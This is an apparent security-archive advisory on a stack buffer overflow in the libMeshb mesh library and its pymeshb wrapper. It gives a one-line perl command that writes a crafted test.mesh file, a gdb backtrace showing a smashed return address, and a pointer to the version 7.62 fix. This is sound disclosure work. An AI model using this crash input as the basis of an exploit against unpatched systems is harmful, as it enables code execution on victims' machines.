libMeshb Buffer Overflow

libMeshb Buffer Overflow: Posted Jun 2, 2022; Authored by Jeremy Brown; libMeshb suffers from a buffer overflow vulnerability. Version 7.62 has been released to address this issue.; tags | exploit, overflow; SHA-256 | 4eb31ef6c78c0a4496bb470b1fbeb940f7fb6e6336a12f36aa32c13366a7a515; Download | Favorite | View

libMeshb Buffer Overflow

=====
Intro
=====

libMeshb is a library which supports moving between data types for the Gamma Mesh Format. A buffer overflow was found when parsing the MESH format and specially crafted .mesh files could allow for arbitrary code execution.

=====
Repro
=====

No magic bytes or valid header necessary as the bug appears to be an unbounded fscanf() processing mesh headers.

echo -ne `perl -e 'print "B" x 2176'` > test.mesh

========
Debugger
========

(gdb) r test.mesh /tmp/empty.mesh
Starting program: mesh2poly test.mesh /tmp/empty.mesh

*** stack smashing detected ***: terminated

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50

(gdb) bt
#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x00007ffff7ddb859 in __GI_abort () at abort.c:79
#2  0x00007ffff7e463ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7f7007c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155
#3  0x00007ffff7ee8b4a in __GI___fortify_fail (msg=msg@entry=0x7ffff7f70064 "stack smashing detected") at fortify_fail.c:26
#4  0x00007ffff7ee8b16 in __stack_chk_fail () at stack_chk_fail.c:24
#5  0x000055555555b5d2 in GmfOpenMesh ()
#6  0x4242424242424242 in ?? ()
#7  0x0000000000000000 in ?? ()

(gdb) exploitable
Description: Stack buffer overflow
Short description: StackBufferOverflow (6/22)
Hash: ea307ff89c1110d6e6c6f565bfc6a9ce.350b4f5ab2938b2eb4fa0a598f3508e1
Exploitability Classification: EXPLOITABLE
Explanation: The target stopped while handling a signal that was generated by libc due to detection of a stack buffer overflow. Stack buffer overflows are generally considered exploitable.
Other tags: PossibleStackCorruption (7/22), AbortSignal (20/22)

This also affects the python wrapper library pymeshb.

>>> import pymeshb
>>> pymeshb.read('test.mesh')
*** stack smashing detected ***: terminated
Aborted (core dumped)

===
Fix
===

libMeshb v7.62

- https://github.com/LoicMarechal/libMeshb/commit/8cd68c54e0647c0030ae4506a225ad4a2655c316

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

libMeshb Buffer Overflow

libMeshb Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

libMeshb Buffer Overflow

Share This

libMeshb Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems